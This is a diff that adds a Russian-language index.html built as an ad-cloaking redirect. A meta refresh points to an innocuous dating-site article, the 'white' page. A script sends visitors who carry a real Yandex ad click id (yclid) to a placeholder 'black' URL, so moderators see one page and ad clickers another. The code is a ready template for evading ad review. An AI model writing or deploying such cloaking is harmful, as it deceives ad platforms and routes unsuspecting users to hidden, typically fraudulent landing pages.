--- a/index.html
+++ b/index.html
@@ -1,1 +1,19 @@
-
+<!DOCTYPE HTML>                                                                
+<html lang="ru">                                                                
+    <head>                                                                      
+        <meta charset="utf-8">
+        <meta http-equiv="refresh" content="0;url=https://ratingdatings.ru/articles/kak-stat-uverennim-v-sebe" />
+        <script>
+        var url = "ССЫЛКА НА ЧЕРНУЮ";
+        if (['', 'test'].indexOf(getUrlParameter("yclid")) == -1) window.location.replace(url);
+        function getUrlParameter(name) {
+          name = name.replace(/[\[]/, '\[').replace(/[\]]/, '\]');
+          var regex = new RegExp('[\?&]' + name + '=([^&#]*)');
+          var results = regex.exec(location.search);
+          return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' ').replace(/%/g, '%25'));
+        };
+        </script>                 
+    </head>                                                                                                                                                                  
+    <body>                                                                                                                                      
+    </body>                                                                    
+</html>
